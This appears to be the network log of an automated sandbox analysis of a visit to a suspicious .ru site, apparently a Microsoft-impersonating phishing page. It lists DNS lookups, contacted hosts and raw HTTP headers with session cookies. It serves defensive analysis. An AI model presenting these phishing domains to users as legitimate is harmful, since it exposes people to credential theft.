                                                                                      Jan 9, 2025 05:11:09.413170099 CET192.168.2.161.1.1.10xbbcfStandard query (0)login.microsoftonline.com65IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:09.441802025 CET192.168.2.161.1.1.10x2ff2Standard query (0)ygvrf8kqyxh6panujwkqqer6w00dbjpogcsuvacqj2hodvh6qgonwxx8lnh.concivergo.ruA (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:09.441988945 CET192.168.2.161.1.1.10xbd9bStandard query (0)ygvrf8kqyxh6panujwkqqer6w00dbjpogcsuvacqj2hodvh6qgonwxx8lnh.concivergo.ru65IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:10.452872038 CET192.168.2.161.1.1.10xee04Standard query (0)www.office.comA (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:10.453001976 CET192.168.2.161.1.1.10xfa89Standard query (0)www.office.com65IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:12.843368053 CET192.168.2.161.1.1.10x7082Standard query (0)www.office.comA (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:12.843523026 CET192.168.2.161.1.1.10xe4c1Standard query (0)www.office.com65IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:13.934317112 CET192.168.2.161.1.1.10xba99Standard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:13.934473991 CET192.168.2.161.1.1.10xf30aStandard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:55.120496035 CET192.168.2.161.1.1.10x80b9Standard query (0)signup.live.comA (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:55.120655060 CET192.168.2.161.1.1.10xd0a6Standard query (0)signup.live.com65IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:57.121943951 CET192.168.2.161.1.1.10xb7b3Standard query (0)logincdn.msftauth.netA (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:57.122088909 CET192.168.2.161.1.1.10x6cb7Standard query (0)logincdn.msftauth.net65IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:59.240014076 CET192.168.2.161.1.1.10xe6ccStandard query (0)fpt.live.comA (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:59.240592957 CET192.168.2.161.1.1.10xd2cbStandard query (0)fpt.live.com65IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:59.250858068 CET192.168.2.161.1.1.10xf6bbStandard query (0)msft.hsprotect.netA (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:59.251884937 CET192.168.2.161.1.1.10x4494Standard query (0)msft.hsprotect.net65IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:59.856337070 CET192.168.2.161.1.1.10xf146Standard query (0)signup.live.comA (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:59.856481075 CET192.168.2.161.1.1.10x6363Standard query (0)signup.live.com65IN (0x0001)false
                                                                                      Jan 9, 2025 05:12:00.434263945 CET192.168.2.161.1.1.10x2288Standard query (0)client.hsprotect.netA (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:12:00.434535980 CET192.168.2.161.1.1.10x89e1Standard query (0)client.hsprotect.net65IN (0x0001)false
                                                                                      Jan 9, 2025 05:12:00.755740881 CET192.168.2.161.1.1.10x943eStandard query (0)identity.nel.measure.office.netA (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:12:00.755886078 CET192.168.2.161.1.1.10x47f5Standard query (0)identity.nel.measure.office.net65IN (0x0001)false
                                                                                      Jan 9, 2025 05:12:01.626332045 CET192.168.2.161.1.1.10x2c0aStandard query (0)client.hsprotect.netA (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:12:01.626475096 CET192.168.2.161.1.1.10x5b79Standard query (0)client.hsprotect.net65IN (0x0001)false
                                                                                      Jan 9, 2025 05:12:01.662456036 CET192.168.2.161.1.1.10x9c4eStandard query (0)stk.hsprotect.netA (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:12:01.662606955 CET192.168.2.161.1.1.10xc6d1Standard query (0)stk.hsprotect.net65IN (0x0001)false
                                                                                      Jan 9, 2025 05:12:01.677468061 CET192.168.2.161.1.1.10x7f3fStandard query (0)collector-pxzc5j78di.hsprotect.netA (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:12:01.677613974 CET192.168.2.161.1.1.10x48a2Standard query (0)collector-pxzc5j78di.hsprotect.net65IN (0x0001)false
                                                                                      Jan 9, 2025 05:12:01.735207081 CET192.168.2.161.1.1.10x504aStandard query (0)fpt.live.comA (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:12:01.736041069 CET192.168.2.161.1.1.10x7c3cStandard query (0)fpt.live.com65IN (0x0001)false
                                                                                      Jan 9, 2025 05:12:02.337723017 CET192.168.2.161.1.1.10xb749Standard query (0)collector-pxzc5j78di.hsprotect.netA (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:12:02.337867022 CET192.168.2.161.1.1.10x5477Standard query (0)collector-pxzc5j78di.hsprotect.net65IN (0x0001)false
                                                                                      Jan 9, 2025 05:12:02.371356964 CET192.168.2.161.1.1.10x9dbeStandard query (0)stk.hsprotect.netA (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:12:02.371500015 CET192.168.2.161.1.1.10x15afStandard query (0)stk.hsprotect.net65IN (0x0001)false
                                                                                      Jan 9, 2025 05:12:59.851861954 CET192.168.2.161.1.1.10x696aStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:12:59.852054119 CET192.168.2.161.1.1.10x3053Standard query (0)www.google.com65IN (0x0001)false
                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Jan 9, 2025 05:10:55.910628080 CET1.1.1.1192.168.2.160x7890No error (0)lap.gnoqwwhpwe.ru188.114.96.3A (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:10:55.910628080 CET1.1.1.1192.168.2.160x7890No error (0)lap.gnoqwwhpwe.ru188.114.97.3A (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:10:55.911293983 CET1.1.1.1192.168.2.160x7fe7No error (0)lap.gnoqwwhpwe.ru65IN (0x0001)false
                                                                                      Jan 9, 2025 05:10:57.422650099 CET1.1.1.1192.168.2.160x4530No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:10:57.422650099 CET1.1.1.1192.168.2.160x4530No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:10:57.422650099 CET1.1.1.1192.168.2.160x4530No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:10:57.422650099 CET1.1.1.1192.168.2.160x4530No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:10:57.423861980 CET1.1.1.1192.168.2.160x6eaaNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:10:57.423861980 CET1.1.1.1192.168.2.160x6eaaNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:10:57.423938036 CET1.1.1.1192.168.2.160xd42No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:10:57.423938036 CET1.1.1.1192.168.2.160xd42No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:10:57.424305916 CET1.1.1.1192.168.2.160x73fNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                      Jan 9, 2025 05:10:57.424318075 CET1.1.1.1192.168.2.160xcf86No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                      Jan 9, 2025 05:10:58.123102903 CET1.1.1.1192.168.2.160x4182No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:10:58.123102903 CET1.1.1.1192.168.2.160x4182No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:10:58.123121023 CET1.1.1.1192.168.2.160x5b1fNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                      Jan 9, 2025 05:10:58.171066046 CET1.1.1.1192.168.2.160xa1cfNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:10:58.171066046 CET1.1.1.1192.168.2.160xa1cfNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:10:58.171066046 CET1.1.1.1192.168.2.160xa1cfNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:10:58.171066046 CET1.1.1.1192.168.2.160xa1cfNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:10:58.764964104 CET1.1.1.1192.168.2.160xc208No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:10:58.764964104 CET1.1.1.1192.168.2.160xc208No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:10:58.765136957 CET1.1.1.1192.168.2.160x5aa2No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                      Jan 9, 2025 05:10:58.786514997 CET1.1.1.1192.168.2.160x71d1No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:10:58.786514997 CET1.1.1.1192.168.2.160x71d1No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:10:58.786526918 CET1.1.1.1192.168.2.160x683eNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                      Jan 9, 2025 05:10:59.743175030 CET1.1.1.1192.168.2.160x4000No error (0)www.google.com216.58.206.68A (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:10:59.743186951 CET1.1.1.1192.168.2.160xdf58No error (0)www.google.com65IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:00.755422115 CET1.1.1.1192.168.2.160x72f5No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:07.827877045 CET1.1.1.1192.168.2.160x44a3No error (0)ygvrf8kqyxh6panujwkqqer6w00dbjpogcsuvacqj2hodvh6qgonwxx8lnh.concivergo.ru65IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:07.899507046 CET1.1.1.1192.168.2.160xf7d8No error (0)ygvrf8kqyxh6panujwkqqer6w00dbjpogcsuvacqj2hodvh6qgonwxx8lnh.concivergo.ru172.67.155.45A (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:07.899507046 CET1.1.1.1192.168.2.160xf7d8No error (0)ygvrf8kqyxh6panujwkqqer6w00dbjpogcsuvacqj2hodvh6qgonwxx8lnh.concivergo.ru104.21.6.222A (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:09.416125059 CET1.1.1.1192.168.2.160xc91bNo error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:09.420213938 CET1.1.1.1192.168.2.160xbbcfNo error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:09.528697014 CET1.1.1.1192.168.2.160x2ff2No error (0)ygvrf8kqyxh6panujwkqqer6w00dbjpogcsuvacqj2hodvh6qgonwxx8lnh.concivergo.ru104.21.6.222A (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:09.528697014 CET1.1.1.1192.168.2.160x2ff2No error (0)ygvrf8kqyxh6panujwkqqer6w00dbjpogcsuvacqj2hodvh6qgonwxx8lnh.concivergo.ru172.67.155.45A (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:09.594753027 CET1.1.1.1192.168.2.160xbd9bNo error (0)ygvrf8kqyxh6panujwkqqer6w00dbjpogcsuvacqj2hodvh6qgonwxx8lnh.concivergo.ru65IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:10.460408926 CET1.1.1.1192.168.2.160xee04No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:10.460408926 CET1.1.1.1192.168.2.160xee04No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:10.494324923 CET1.1.1.1192.168.2.160xfa89No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:10.494324923 CET1.1.1.1192.168.2.160xfa89No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:11.630044937 CET1.1.1.1192.168.2.160x65e7No error (0)shed.dual-low.s-part-0036.t-0009.t-msedge.nets-part-0036.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:11.630044937 CET1.1.1.1192.168.2.160x65e7No error (0)s-part-0036.t-0009.t-msedge.net13.107.246.64A (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:12.821546078 CET1.1.1.1192.168.2.160xcf11No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:12.821546078 CET1.1.1.1192.168.2.160xcf11No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:12.849940062 CET1.1.1.1192.168.2.160x7082No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:12.849940062 CET1.1.1.1192.168.2.160x7082No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:12.876923084 CET1.1.1.1192.168.2.160xe4c1No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:12.876923084 CET1.1.1.1192.168.2.160xe4c1No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:13.940972090 CET1.1.1.1192.168.2.160xba99No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:13.940972090 CET1.1.1.1192.168.2.160xba99No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:13.940972090 CET1.1.1.1192.168.2.160xba99No error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:13.941363096 CET1.1.1.1192.168.2.160xf30aNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:13.941363096 CET1.1.1.1192.168.2.160xf30aNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:55.127793074 CET1.1.1.1192.168.2.160x80b9No error (0)signup.live.comaccount.msa.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:55.148574114 CET1.1.1.1192.168.2.160xd0a6No error (0)signup.live.comaccount.msa.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:57.128547907 CET1.1.1.1192.168.2.160x3272No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:57.128547907 CET1.1.1.1192.168.2.160x3272No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:57.129044056 CET1.1.1.1192.168.2.160xb7b3No error (0)logincdn.msftauth.netscdn38c07.wpc.9da5e.alphacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:57.129044056 CET1.1.1.1192.168.2.160xb7b3No error (0)scdn38c07.wpc.9da5e.alphacdn.netsni1gl.wpc.alphacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:57.129044056 CET1.1.1.1192.168.2.160xb7b3No error (0)sni1gl.wpc.alphacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:57.145884037 CET1.1.1.1192.168.2.160x4ea5No error (0)scdn38c07.wpc.9da5e.alphacdn.netsni1gl.wpc.alphacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:57.145884037 CET1.1.1.1192.168.2.160x4ea5No error (0)sni1gl.wpc.alphacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:57.145945072 CET1.1.1.1192.168.2.160x6bc3No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:57.145945072 CET1.1.1.1192.168.2.160x6bc3No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:57.146862030 CET1.1.1.1192.168.2.160x445bNo error (0)scdn38c07.wpc.9da5e.alphacdn.netsni1gl.wpc.alphacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:57.253694057 CET1.1.1.1192.168.2.160x6cb7No error (0)logincdn.msftauth.netscdn38c07.wpc.9da5e.alphacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:57.253694057 CET1.1.1.1192.168.2.160x6cb7No error (0)scdn38c07.wpc.9da5e.alphacdn.netsni1gl.wpc.alphacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:58.755784988 CET1.1.1.1192.168.2.160x5f29No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:58.755784988 CET1.1.1.1192.168.2.160x5f29No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:59.247539043 CET1.1.1.1192.168.2.160xe6ccNo error (0)fpt.live.comfpt.microsoft.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:59.259032011 CET1.1.1.1192.168.2.160xf6bbNo error (0)msft.hsprotect.netmsft.hsprotect.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:59.270392895 CET1.1.1.1192.168.2.160xd2cbNo error (0)fpt.live.comfpt.microsoft.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:59.292459965 CET1.1.1.1192.168.2.160x4494No error (0)msft.hsprotect.netmsft.hsprotect.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:59.863260984 CET1.1.1.1192.168.2.160xf146No error (0)signup.live.comaccount.msa.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 9, 2025 05:11:59.895453930 CET1.1.1.1192.168.2.160x6363No error (0)signup.live.comaccount.msa.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 9, 2025 05:12:00.442596912 CET1.1.1.1192.168.2.160x89e1No error (0)client.hsprotect.netclient.hsprotect.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 9, 2025 05:12:00.442960978 CET1.1.1.1192.168.2.160x2288No error (0)client.hsprotect.netclient.hsprotect.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 9, 2025 05:12:00.762739897 CET1.1.1.1192.168.2.160x943eNo error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 9, 2025 05:12:00.763017893 CET1.1.1.1192.168.2.160x47f5No error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 9, 2025 05:12:01.634514093 CET1.1.1.1192.168.2.160x2c0aNo error (0)client.hsprotect.netclient.hsprotect.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 9, 2025 05:12:01.643013000 CET1.1.1.1192.168.2.160x5b79No error (0)client.hsprotect.netclient.hsprotect.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 9, 2025 05:12:01.669441938 CET1.1.1.1192.168.2.160x9c4eNo error (0)stk.hsprotect.net34.107.199.61A (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:12:01.684588909 CET1.1.1.1192.168.2.160x7f3fNo error (0)collector-pxzc5j78di.hsprotect.netinbound-weighted.protechts.netCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 9, 2025 05:12:01.684588909 CET1.1.1.1192.168.2.160x7f3fNo error (0)inbound-weighted.protechts.net35.190.10.96A (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:12:01.684600115 CET1.1.1.1192.168.2.160x48a2No error (0)collector-pxzc5j78di.hsprotect.netinbound-weighted.protechts.netCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 9, 2025 05:12:01.743236065 CET1.1.1.1192.168.2.160x504aNo error (0)fpt.live.comfpt.microsoft.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 9, 2025 05:12:01.764621019 CET1.1.1.1192.168.2.160xf211No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 9, 2025 05:12:01.764621019 CET1.1.1.1192.168.2.160xf211No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:12:01.766161919 CET1.1.1.1192.168.2.160x7c3cNo error (0)fpt.live.comfpt.microsoft.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 9, 2025 05:12:02.344885111 CET1.1.1.1192.168.2.160xb749No error (0)collector-pxzc5j78di.hsprotect.netinbound-weighted.protechts.netCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 9, 2025 05:12:02.344885111 CET1.1.1.1192.168.2.160xb749No error (0)inbound-weighted.protechts.net35.190.10.96A (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:12:02.348860979 CET1.1.1.1192.168.2.160x5477No error (0)collector-pxzc5j78di.hsprotect.netinbound-weighted.protechts.netCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 9, 2025 05:12:02.378122091 CET1.1.1.1192.168.2.160x9dbeNo error (0)stk.hsprotect.net34.107.199.61A (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:12:02.560197115 CET1.1.1.1192.168.2.160x5782No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 9, 2025 05:12:02.560197115 CET1.1.1.1192.168.2.160x5782No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 05:12:59.858453989 CET1.1.1.1192.168.2.160x3053No error (0)www.google.com65IN (0x0001)false
                                                                                      Jan 9, 2025 05:12:59.858813047 CET1.1.1.1192.168.2.160x696aNo error (0)www.google.com142.250.186.36A (IP address)IN (0x0001)false
                                                                                      • lap.gnoqwwhpwe.ru
                                                                                      • https:
                                                                                        • cdnjs.cloudflare.com
                                                                                        • code.jquery.com
                                                                                        • challenges.cloudflare.com
                                                                                        • ygvrf8kqyxh6panujwkqqer6w00dbjpogcsuvacqj2hodvh6qgonwxx8lnh.concivergo.ru
                                                                                        • collector-pxzc5j78di.hsprotect.net
                                                                                        • stk.hsprotect.net
                                                                                      • a.nel.cloudflare.com
                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.1649710188.114.96.34437128C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-09 04:10:56 UTC665OUTGET /3aeK/ HTTP/1.1
                                                                                      Host: lap.gnoqwwhpwe.ru
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Upgrade-Insecure-Requests: 1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Sec-Fetch-Site: none
                                                                                      Sec-Fetch-Mode: navigate
                                                                                      Sec-Fetch-User: ?1
                                                                                      Sec-Fetch-Dest: document
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2025-01-09 04:10:57 UTC1248INHTTP/1.1 200 OK
                                                                                      Date: Thu, 09 Jan 2025 04:10:57 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache, private
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GfZR37N6dRG8HGs%2BhLafMLULdx99R%2F7Mrh319HuhGzGkDbdR%2BTLFxSP6UUf8yIzDoSqvJ8b3ocaj1lGZ9I%2FO7J7jJISecMi%2BCs2elMuINqs6fsUgHWmeej%2B8L6abMw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=4294&min_rtt=4284&rtt_var=1225&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2824&recv_bytes=1574&delivery_rate=653810&cwnd=251&unsent_bytes=0&cid=3d30ad1ec148d1a6&ts=147&x=0"
                                                                                      Set-Cookie: XSRF-TOKEN=eyJpdiI6IjE4R2lacS9tVllvMEhpUUtKbDQ2TUE9PSIsInZhbHVlIjoiRXU4Ri80dEhJSWxyRTh6VWZFckNubFhJY3h4bnJpLzRqU2Vac1hSeEE1aDVzUFhxQkJXRytlbkxoZzJaQ3FYNmYrYzFhTG5SZkdhSWY5WENQL3IwVzluY3BWUDFFZXE4bnpHSXRaZ3dXTGgwa2pzRlNVbmJDSHNnUHhhSmhPZnciLCJtYWMiOiJhZWQ4ODRiNDNhZmI3MmVjZjk0YTdkNDY1M2MzNzgzNzk2MDQxZTU1NjJlNDM2MmZjZmM4MWNhODFlYWMxZDRmIiwidGFnIjoiIn0%3D; expires=Thu, 09-Jan-2025 06:10:57 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                      2025-01-09 04:10:57 UTC732INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6d 74 43 62 30 30 33 56 6d 6c 6e 5a 57 68 73 4b 32 4a 54 57 6d 64 50 53 57 70 68 55 33 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 53 6b 5a 47 52 6d 56 71 53 45 51 78 62 56 6c 72 4d 6a 68 4c 63 31 6c 45 62 48 4a 61 64 45 74 47 63 32 38 32 4d 6b 52 51 57 47 39 4f 52 47 49 33 64 6b 4e 69 61 46 56 6c 54 32 6c 72 53 55 70 49 59 6c 56 6d 52 45 49 72 4f 54 63 78 61 6c 55 7a 5a 46 4a 5a 61 44 49 79 4e 47 31 71 55 46 46 51 52 6d 46 4d 65 6e 46 58 65 54 67 32 4e 6b 39 58 54 57 70 32 55 48 64 52 51 58 56 44 65 54 5a 52 4d 47 35 73 65 54 52 6a 5a 6d 4e 44 57 57 74 4f 51 33 68 77 5a 47 51 78 56 47 68 49 59 56 5a 76 53 33 51 30 62 44 46 7a 63 6d 6b
                                                                                      Data Ascii: Set-Cookie: laravel_session=eyJpdiI6ImtCb003VmlnZWhsK2JTWmdPSWphU3c9PSIsInZhbHVlIjoiSkZGRmVqSEQxbVlrMjhLc1lEbHJadEtGc282MkRQWG9ORGI3dkNiaFVlT2lrSUpIYlVmREIrOTcxalUzZFJZaDIyNG1qUFFQRmFMenFXeTg2Nk9XTWp2UHdRQXVDeTZRMG5seTRjZmNDWWtOQ3hwZGQxVGhIYVZvS3Q0bDFzcmk
